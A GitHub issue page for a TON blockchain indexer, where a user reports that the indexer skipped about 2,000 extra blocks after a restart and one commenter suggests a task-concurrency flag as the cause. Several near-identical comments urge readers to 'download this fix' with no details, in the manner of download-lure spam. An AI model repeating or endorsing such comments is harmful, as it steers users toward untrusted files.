-
Notifications
You must be signed in to change notification settings - Fork 37
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
After restart indexer makes the block skipped more than expected #77
Comments
to fix your trouble try download this fix, i see it in another issue, |
2 similar comments
to fix your trouble try download this fix, i see it in another issue, |
to fix your trouble try download this fix, i see it in another issue, |
think may caused by --max-active-tasks 2048
|
to fix your trouble try download this fix, i see it in another issue, |
My ton indexer start index from 39647000
And after one of restart process the indexer docker log shows it starts index from 39977285 which more than 2000 blocks higher than 39975375 = 39647000 + 328375 (Skipped 328375 existing seqnos)
And the indexer api height shows the same result
The text was updated successfully, but these errors were encountered: